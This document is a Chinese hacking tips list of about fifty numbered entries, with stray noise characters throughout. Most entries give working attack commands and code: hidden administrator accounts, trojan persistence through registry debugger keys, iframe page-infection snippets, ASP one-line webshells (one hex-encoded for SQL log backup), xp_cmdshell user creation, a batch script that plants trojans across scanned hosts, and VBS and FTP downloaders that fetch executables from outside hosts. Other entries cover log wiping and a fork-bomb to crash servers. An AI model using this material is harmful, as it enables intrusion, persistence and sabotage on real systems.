Xp系统修改权限防止病毒或木马等破坏系统,cmd下,0 Q* ~* E% G& P& I2 Z& {6 a/ B
cacls C:\windows\system32 /G hqw20:R
! H6 u9 i9 v4 E" Q' \& i) ^2 a思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
+ |' p5 v! e# `& n! S2 ?3 ^恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F& N& P J* j& y1 E; {' N
- b* u D6 n+ x, k$ {: Y+ G2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
2 Q1 N9 }: ]3 H/ r1 V l! _& c/ T2 d8 A9 N* L' }; j6 Z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 Q+ ?1 v; \' O6 L4 p: ^
# O. J( C- ]$ X9 j6 r* c4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号& M8 H/ _& P- [1 {
9 {1 t9 s- ?' x i* r# {3 C0 n f- T5、利用INF文件来修改注册表% E# h9 ? V2 [4 F
[Version]
" b+ B; `* p7 nSignature="$CHICAGO$": P9 O: K. Z* g3 B$ b" c. i
[Defaultinstall]9 ?' q2 M2 v: |! [
addREG=Ating8 K: Q. ~( M$ ^8 s% v
[Ating]
1 x P* n, b {6 o) Z8 QHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
- I- m9 f9 t: q( Y# h以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:/ P+ L1 A0 ] \$ j* y& I1 M, R/ z5 H
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径' n3 F. g& m! f& x( f% k7 ^: i
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
+ x3 X/ `" S$ S* @HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU, d+ L- p: K" v7 s
HKEY_CURRENT_CONFIG 简写为 HKCC2 [# H6 m! Q: q$ @& l) [
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值' a5 U/ L" V0 i; p1 ?
"1"这里代表是写入或删除注册表键值中的具体数据
J2 Z0 ]4 z( a5 o( {# I0 D) s: P# ~7 U, p
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,5 @& a8 Z1 g M6 Z
多了一步就是在防火墙里添加个端口,然后导出其键值
1 q( v& z' F0 x4 a5 u6 i1 |[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
! n# h' v6 ` v6 g
. g0 j3 X$ h7 y7 h8 X d7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
/ j! d: ]1 X8 {; @. X在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
3 \: e$ V' ~. O$ e1 {, o7 P9 I( w6 N1 D. N" H- l. @* M
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。( H, M. I% f. V, z" d9 f! a- g
+ Q s- `9 X* |- F: d7 D5 C
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,& r: p" d7 A2 C7 ~4 X- J
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 U7 Z& r: e' V {" Q; |2 S v' Z1 Y- X" u- E: _* v- s# @
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”. \+ e9 I: e, U2 m* |
) w+ L9 R- k) H7 B R6 n7 t* G
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
/ w6 x. H) G' ]+ b) M1 j( `& [1 T) w, [* }用法:xsniff –pass –hide –log pass.txt
2 C3 B( I9 p' r- g! S* g# ~! r: F& _$ C/ A. b# T& P4 W
12、google搜索的艺术
/ H- ]5 C+ O! w* U P搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
1 |# |4 z* u2 X6 ^1 g7 C$ _& @或“字符串的语法错误”可以找到很多sql注入漏洞。: ?" l( E+ G* b, C p ?
% S3 f- i/ M- q4 M |/ r
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
( {3 p4 T; E; i @# K" d7 a! f# J; K1 a0 R) t
14、cmd中输入 nc –vv –l –p 19877 P' h% G* e8 q2 ?0 o
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
1 D' d$ n& P7 W$ C" m6 [0 \: {) C" a) m9 Z5 J
15、制作T++木马,先写个ating.hta文件,内容为
: r& f8 n9 Y, P; a- x: Z<script language="VBScript">
& \& R1 A+ w; e2 Vset wshshell=createobject ("wscript.shell" )( L- ~3 a4 g. z `5 Q9 D0 `, x
a=wshshell.run("你马的名称",1)
( S) A% T+ U9 r2 ]9 Z! xwindow.close. _& j6 R4 m1 D* ~
</script>
, ]1 ?. i/ f( l5 m! k, A$ ^再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
1 E7 h+ g5 m. B8 r' W% B: O @, B V4 [8 ]! S, ]0 u# O
16、搜索栏里输入5 s9 T0 \" S6 _& s
关键字%'and 1=1 and '%'='
! F+ g. S8 ?0 \. s& q e( j关键字%'and 1=2 and '%'='* M( T0 C' l9 h6 \3 O
比较不同处 可以作为注入的特征字符
- |2 R. v5 m+ x) r6 g7 H- X4 T: @6 f6 g E2 B4 Z: t
17、挂马代码<html>
( y6 s* e" a7 k3 `% O3 b S+ y* A2 Y<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
$ l* H8 {; {8 Q9 q" \</html>
( `) }* U6 e1 U4 ^, k) L0 z1 n6 x8 f7 E; l" ]' O- j+ Z$ L
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,9 p" O T V# G
net localgroup administrators还是可以看出Guest是管理员来。
9 Y. R" c% K7 ]: _4 @* e" C5 Z% ]6 }) C4 Z; E" ]$ o! c
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
1 L9 O& G$ G& g2 H. b9 U' z用法: 安装: instsrv.exe 服务名称 路径( `! m& c7 N, ?# @& o& Y
卸载: instsrv.exe 服务名称 REMOVE
: _% k% E4 q: b, |8 B0 H$ r! L0 m4 z1 C' a+ d( j: f( N& Z
( A: [; b* M' b' h p3 b+ ]
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉% V, q8 S* I6 r# N6 T6 W4 u$ I
不能注入时要第一时间想到%5c暴库。; Q. m! u2 W7 s+ [
X3 j" K c9 b& A* @6 V
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~* ?! h% d: o8 Y' A
) j7 E( G5 G& n% m& i
23、缺少xp_cmdshell时& Q! \! G6 U- s1 F8 L
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% W; ^7 f) A7 ?% i* Z% P, `
假如恢复不成功,可以尝试直接加用户(针对开3389的)3 R* F" w. g6 ~5 C
declare @o int2 d/ O, V. }5 E4 N
exec sp_oacreate 'wscript.shell',@o out
# h; ]+ Z" O7 w" Bexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
6 A+ f N( n* ]& [: [1 l9 M: a4 X, Z' S0 ]) E1 P
24.批量种植木马.bat
4 O' ?# @ j: E, Mfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中, a# B% b5 N" G; a; \5 g
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
' o; q" t1 z1 `+ S! N扫描地址.txt里每个主机名一行 用\\开头
4 K( o$ ]( x- T0 n( ^# ~+ W/ R- B5 m& i" {, d6 L9 F0 I
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。8 W) H# c' ]0 ?6 ~/ Q {9 `# |5 D
, ?" h& I9 R& T5 x) w9 v# k
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
% r$ @) e3 @& I, M将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
) d0 V, l7 n8 ~7 x.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% ^9 b) ]7 }4 N) [9 i z/ k U
8 U2 H5 E3 J( |6 M6 ? ?: U$ r. v4 V2 u27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP; _+ b0 v/ t; P$ Q* v2 Q
然后用#clear logg和#clear line vty *删除日志
6 ]3 V+ P" m/ H K( \: [3 r
9 x7 ]# C. R9 S7 |, R28、电脑坏了省去重新安装系统的方法 E" a# q% a- a t) _0 l6 D5 H
纯dos下执行,7 b% i" R$ X* k6 I% w `
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
. H' W, a# q" M& K, ?1 M2 R2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 L2 a2 Q* E$ c. J9 r% A& M' m' W5 H
29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 ?, A! H! M1 dHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip8 |4 N2 J1 f. s6 n
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 o5 y3 o% d# k1 X0 C0 A- THKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; B/ I+ D7 v- \5 S" C& A) J
分别用
& ^' J1 V! A- a. gregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: z. |# H: A& m3 C+ N/ Uregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 z9 G8 h$ ^2 _4 M% H+ d( F, Kregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
c) _4 G4 _6 B9 N命令来导出注册表项$ O s' O5 y6 j6 D
然后把三个文件里的EnableSecurityFilters"=dword:00000001,& Y' O) ~; Y/ u' Y, t
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
9 |: @$ Y' V9 {7 _/ B1 ?regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。& o6 W& H) q1 C4 [/ v* W
! h- u# Q) N2 S# u0 V
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U H( S- }5 n! _ t. |
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3+ o, \+ |5 y) T! P9 u
" s( s* X: @; O/ N
31、全手工打造开3389工具/ \$ f$ b* K, ?5 N; {
打开记事本,编辑内容如下:" J3 }* a3 g8 w( s- Z9 P( l
echo [Components] > c:\sql: y. l/ I$ z7 u; S. I3 W
echo TSEnable = on >> c:\sql5 W4 d$ L" `7 o A' _. Q
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q; t2 e1 n& e: S2 `( N$ \
编辑好后存为BAT文件,上传至肉鸡,执行
2 G6 Y5 F! ~/ Q* R7 l% e7 O- `( | M; u. a" R$ G
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
K# S$ h, A( | H; R, e
; D( {/ C+ k$ d4 Z1 u) V, d2 P33、让服务器重启
1 [7 N- e$ r. K, a% h* U) r: K写个bat死循环:
. \5 B/ q! T& f7 |% @@echo off, G7 m* b$ f0 w( o5 J* H
:loop1
6 e7 z& O9 E: U& D( w `8 tcls* |! [3 d: [( ?! f Z0 u
start cmd.exe7 j. ?/ y* y+ o+ a1 t
goto loop1
* U B0 u+ I- r" p保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启' E9 \9 {. q) Y) I. s
( T" \; }1 }4 x) ^8 F4 `34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
$ K4 Z" t: y- N" Z" f, X@echo off2 x1 c! C6 `1 h
date /t >c:/3389.txt
1 l4 }0 W2 s1 N+ d6 Z E5 mtime /t >>c:/3389.txt
, c( l8 a/ ?' f6 d( ?attrib +s +h c:/3389.bat: `; z9 a+ ~' `0 w/ ~6 e9 g# ]
attrib +s +h c:/3389.txt
' B8 d1 L: j4 L" i6 [; Gnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt, `; B' C& c4 s9 v
并保存为3389.bat. c4 u" Z3 }" x0 m$ H9 J3 ~
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
s: E& o. S( [0 _! d' [+ s, E& B2 U- I1 V( t. E
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
6 r% F( B7 z$ p% F3 }- Lstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)* O* T& \ p. X5 ^! }$ ]. ~
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
3 C1 ]5 O* A% ~* S, }& z8 d
) u% b, \& n5 @' b7 ]5 }$ ^, M36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
2 @' Y* n& I# A- ?echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
- r1 h; n9 e' n, ?6 O* aecho 你的FTP账号 >>c:\1.bat //输入账号
$ c E" y/ t( L1 i# f. eecho 你的FTP密码 >>c:\1.bat //输入密码! A. I: m5 Z, W
echo bin >>c:\1.bat //登入9 \8 q$ ~" R( Z6 N0 }1 L
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么0 K+ a4 Z4 s6 n ^) d9 v/ {, p# l& G
echo bye >>c:\1.bat //退出6 b: M7 w8 Z9 x! D& x: q. u
然后执行ftp -s:c:\1.bat即可
1 C9 @+ F+ o2 s5 k' D. N V
3 O6 g) p4 Q8 c6 e2 C37、修改注册表开3389两法
9 [7 r9 G4 z$ x; w' Z(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表5 N, b5 N( w2 ^3 B: d1 V- L j4 [
echo Windows Registry Editor Version 5.00 >>3389.reg
8 \& J% Y9 E8 yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
7 }& ~7 H7 Y/ p1 techo "Enabled"="0" >>3389.reg4 t& j/ L& J- B4 T3 g( [
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
T& }& d5 r( _0 pNT\CurrentVersion\Winlogon] >>3389.reg
7 Q. J( D2 ^& d1 ^4 B7 Wecho "ShutdownWithoutLogon"="0" >>3389.reg' I6 T7 ^: H3 p% O9 H$ o* X1 H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
. T( S) C: @. D* }& Q8 K>>3389.reg+ l" h, G7 W# F# z( J5 O5 t) |- g$ E
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
' y: }# J8 _4 Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
$ p% S" j% j' b/ P+ L- b j! f. D>>3389.reg
" x. r! q K4 C/ |# x! h# p1 Cecho "TSEnabled"=dword:00000001 >>3389.reg
# A$ \3 j4 S1 m: e; J4 S) E Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, A, a) @8 f) Zecho "Start"=dword:00000002 >>3389.reg
2 `+ c& t2 |1 X, ^: [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
' n' Y& @0 b3 g( J- O8 S4 r>>3389.reg
& ^( ^2 V6 W" Vecho "Start"=dword:00000002 >>3389.reg7 `; e; r* _6 s8 r& A
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
2 R m, m7 b- ^/ Yecho "Hotkey"="1" >>3389.reg* t/ H% U# e0 l+ h2 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 X( {% d8 D/ i7 i0 z0 p
Server\Wds\rdpwd\Tds\tcp] >>3389.reg% O ?- E/ I- C( l: F: q2 c
echo "PortNumber"=dword:00000D3D >>3389.reg
a. N. J" w. f0 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 w2 Y8 V5 Y$ T0 }, HServer\WinStations\RDP-Tcp] >>3389.reg
- K' W2 S$ l' C1 fecho "PortNumber"=dword:00000D3D >>3389.reg
7 ^( Z, ?5 j. O, Q1 l* a8 p把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。+ r, n e, G5 P1 t" F% R' j
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
- n2 `1 j) Q0 ~) i" X M因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
& a9 _0 g, C2 ?8 Z. N(2)winxp和win2003终端开启
) U. @) T; p% X+ v2 q6 { n) Y用以下ECHO代码写一个REG文件:$ p9 F5 S/ H$ M
echo Windows Registry Editor Version 5.00>>3389.reg S: P: h2 J2 d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. H( K5 N O* J
Server]>>3389.reg: _9 c# c0 z; v; u A
echo "fDenyTSConnections"=dword:00000000>>3389.reg T8 S1 q& g7 n. z9 w7 d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: k: t( A" l) l% r1 v5 _' ?
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
% r) V+ l c6 {+ @5 e9 C; D* |echo "PortNumber"=dword:00000d3d>>3389.reg
5 j' Q1 E ]3 w* Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- V. h H s$ {6 t N0 J
Server\WinStations\RDP-Tcp]>>3389.reg
0 u F n7 Y6 Jecho "PortNumber"=dword:00000d3d>>3389.reg2 t. f6 |" c" p
然后regedit /s 3389.reg del 3389.reg
y0 d" B, _4 s* f/ f; VXP下不论开终端还是改终端端口都不需重启
V: u8 j; N3 I* P6 @. ^" I1 j( K- _0 b* {6 C: _+ K4 R9 U
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) Q& A8 [' ^- Z用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', {) v* Q2 r9 T. Q' T3 E/ g" e0 F
* u8 Z: H3 v% ]; |8 w. c7 h
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!+ F6 R* z! G& @2 j
(1)数据库文件名应复杂并要有特殊字符' M' d2 E9 e U" g5 q/ _
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源- Z, F+ r/ S9 |5 E" m
将conn.asp文档中的$ V# p5 `- s8 m( l, z6 w
DBPath = Server.MapPath("数据库.mdb")
; f4 Q6 L- x) L7 l* Rconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
" r% @0 Z" }! L1 J$ r& j
- X9 [+ Z: R! Y- ^5 }9 _' `修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
$ _; p! Q! C& {6 G5 Z) h(3)不放在WEB目录里! L& N3 t# X9 V y7 a9 |5 L0 a! A
1 N k- ]4 [ n
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉+ ?# S% [- n* P! |0 W$ l1 D7 U5 y3 [
可以写两个bat文件
: | I, S& W, l2 Y' G1 g' S+ s@echo off
5 {+ y0 i9 k4 U0 \ H) p% t@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
- i1 F: j9 {! W/ r; p7 N2 s@del c:\winnt\system32\query.exe* l8 ?+ Q! o9 z2 M) R1 t& g
@del %SYSTEMROOT%\system32\dllcache\query.exe8 k m6 M8 J2 I7 O$ d
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
( U% o8 x) P# w/ n7 q! x: f4 n& p9 D9 b
@echo off2 | U' w7 H+ W' K
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
) J$ q# p5 |. ?. z5 q@del c:\winnt\system32\tsadmin.exe
2 s& I% ?, q' g+ q@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
0 l' [5 j+ l& ]1 S2 u" ~# J
" j: _4 d F; \! ~( x: j41、映射对方盘符, ^/ @- W7 d6 V: i0 J' K
telnet到他的机器上,
" u) t: n u9 |; x& W% jnet share 查看有没有默认共享 如果没有,那么就接着运行9 l* `9 H3 n$ T; ^ G2 j2 y" H3 M
net share c$=c:
+ H/ R- T" W/ J( J. g" unet share现在有c$, b: O8 ^$ M3 [1 x
在自己的机器上运行
4 H; F% d. Y: Q# {net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
2 f1 J; {$ Z- }) i
. U3 d, F& ~' R; O0 p$ j42、一些很有用的老知识, o9 u1 c. A0 D* V# ?4 E9 x
type c:\boot.ini ( 查看系统版本 )
, r$ N8 n% a7 c) o" z; ~) Y& c- ]net start (查看已经启动的服务)5 c7 ^. N0 _# _
query user ( 查看当前终端连接 )4 c2 B& i' v/ A
net user ( 查看当前用户 )8 i. c3 O; s7 ^9 F
net user 用户 密码/add ( 建立账号 )
C3 P5 l5 T0 C* z' |net localgroup administrators 用户 /add (提升某用户为管理员)0 q4 W1 w0 U; q5 g, P6 k2 [, I* ~
ipconfig -all ( 查看IP什么的 )" W( G$ B6 f0 ]# a" g9 g
netstat -an ( 查看当前网络状态 )# A( Z8 N$ K( b+ i' ^! C$ m% W, B
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
* E0 O! N9 ~, J k& J克隆时Administrator对应1F4; V1 k1 j+ J( f; r `; D( U8 J
guest对应1F5& E4 }5 U* I4 X* s f) p- V
tsinternetuser对应3E8
0 F c# S0 S: B9 c6 `3 |; D0 N* I& t" Y- W' T5 W
43、如果对方没开3389,但是装了Remote Administrator Service
: D [( D. ^/ _% \ h8 s2 p用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
- @" m9 v+ S6 ^解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ R8 A4 V' j4 f/ z& {8 |* ~+ F
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"4 c6 ~' g. F M' _5 Q
# [- P& J- B9 I3 p) y( `7 A, @" g1 Q44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定). J% } M; e1 k e9 V3 ]% K& u
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ r9 f# ?2 m4 z# [! k, O3 L
* W$ A2 Q% o: `, R2 J
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)/ S( n9 X% ^* F! D; I1 N
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
) M$ I8 ?! Q% E^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
. Y8 S; \. x; E! FCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
3 a2 v7 x6 L# b1 f$ S% V1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs1 D, m, O! Z8 ^5 h1 [
(这是完整的一句话,其中没有换行符)
8 \& p9 J+ O3 \0 \. K' o5 w然后下载:
/ C9 U* o2 T5 D" J' N* Y7 W0 qcscript down.vbs http://www.hack520.org/hack.exe hack.exe* `7 ~9 F# N- O6 B
8 t! x0 d; [1 I% X. d46、一句话木马成功依赖于两个条件:: Q) ]2 \! c. `# e& R8 T9 F
1、服务端没有禁止adodb.Stream或FSO组件
- r' r) p3 i L2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
' R2 ]+ y u& \' ^) @5 p: i' p( ?' p S- C! j
47、利用DB_OWNER权限进行手工备份一句话木马的代码:' \0 s, y! m c& c6 Y6 W
;alter database utsz set RECOVERY FULL--
! Z9 R/ v P& R" M% I$ H;create table cmd (a image)--0 V# o( {5 H& i7 B
;backup log utsz to disk = 'D:\cmd' with init--+ E7 \( L0 T$ }, b9 y% s. X$ `
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- f; b3 R2 m2 {, X& F5 t( D
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--1 s. u; J8 U; A+ Y7 ]
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
1 n( p# N N1 r4 ^4 A& J9 d3 o$ E. o* S/ B; ~ M& k; z! f7 a% T
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) k( S; T/ e2 b' x1 z& K" W7 Z* o$ d5 s) r# U0 D5 x
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
) f+ c0 N% [1 H) a, _所有会话用 'all'。
* _9 L- Q1 Q& |3 a, _4 I-s sessionid 列出会话的信息。
7 P- m6 m+ [% Y7 Z5 J2 r: R-k sessionid 终止会话。
$ @$ o" i1 l S1 w8 }0 i-m sessionid 发送消息到会话。4 l: E! S c: X- f" Y! K- ]
% |" Y8 a: l5 dconfig 配置 telnet 服务器参数。) R% p* {+ I- e: x- L7 v( W( O
+ o0 O' V4 Y. K/ W; t" Dcommon_options 为:9 t( Y( w) @" e) `( i: M; ^
-u user 指定要使用其凭据的用户
0 _. w& p/ N4 b4 t% H- K H0 u" y-p password 用户密码
@3 P& \% V- {% F/ V8 V$ s* P, z, X3 B- W+ g& f7 D7 w/ l5 K& I
config_options 为: B% i7 e9 ], D3 h
dom = domain 设定用户的默认域( ^# x- a& o5 g. ?1 y; ?# w! o
ctrlakeymap = yes|no 设定 ALT 键的映射# {( N. C5 b/ M# T6 `. W* m
timeout = hh:mm:ss 设定空闲会话超时值& h4 @9 \/ q" @# P; `9 Y
timeoutactive = yes|no 启用空闲会话。, h. |- r/ a4 f4 t2 t; W7 X
maxfail = attempts 设定断开前失败的登录企图数。
: ]8 A5 u' C8 e# _: c: u3 Cmaxconn = connections 设定最大连接数。6 j# Q! E) G) p/ ~$ v
port = number 设定 telnet 端口。
# o/ C) K) s' B& ~* dsec = [+/-]NTLM [+/-]passwd
, \8 `+ u1 q" q6 ~2 K设定身份验证机构
; B$ O T3 T+ f: Qfname = file 指定审计文件名。
' P4 N! m1 z- [fsize = size 指定审计文件的最大尺寸(MB)。' ^+ t2 ^0 ?2 O
mode = console|stream 指定操作模式。
* a; G8 J- a4 t1 M1 T0 v9 l. ^auditlocation = eventlog|file|both
4 T( l/ Y9 q C指定记录地点5 V6 }0 y, D O
audit = [+/-]user [+/-]fail [+/-]admin8 E. x+ s7 }/ _3 H7 |" J/ z
1 R/ J$ v& C& H$ T% b49、例如:在IE上访问:# P2 [$ m9 j2 a: [% @: I) G. J Z
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/( n- c& V9 G% C* M
hack.txt里面的代码是:6 ^4 D$ a+ t6 c2 O9 q* {9 \( H+ F
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">8 Z* q8 X9 f5 f2 a2 O0 j- i" x: U
把这个hack.txt发到你空间就可以了!
5 m3 o9 _: G/ H7 ]! X0 l2 g这个可以利用来做网马哦!4 h8 p2 h8 \; ^( h7 Y0 w, Z
9 W6 W) L6 B1 W0 D. k f( h50、autorun的病毒可以通过手动限制!
8 c( G: N/ e% G- [( J1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
; u* a: i, j' C3 e& A) i2,打开盘符用右键打开!切忌双击盘符~
3 ?" C, i5 O* U3 S( |3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
2 s# g* N) p- I& v. ~% E9 j: b" ]8 @% ~5 R! B5 Y
51、log备份时的一句话木马:
% h2 `" k, F. T9 `: da).<%%25Execute(request("go"))%%25>
9 J1 T3 Y' i c/ f; Z2 I0 x0 s( `b).<%Execute(request("go"))%>
6 C2 K8 P( u/ s8 `; }$ ?$ U y! hc).%><%execute request("go")%><%3 N" y" N* F( l5 K
d).<script language=VBScript runat=server>execute request("sb")</Script>
/ L G. `. N; re).<%25Execute(request("l"))%25>
5 ]+ R. ]. { I: |0 Z( u4 \f).<%if request("cmd")<>"" then execute request("pass")%>
8 i/ b9 q! [4 n. q% d$ @4 D
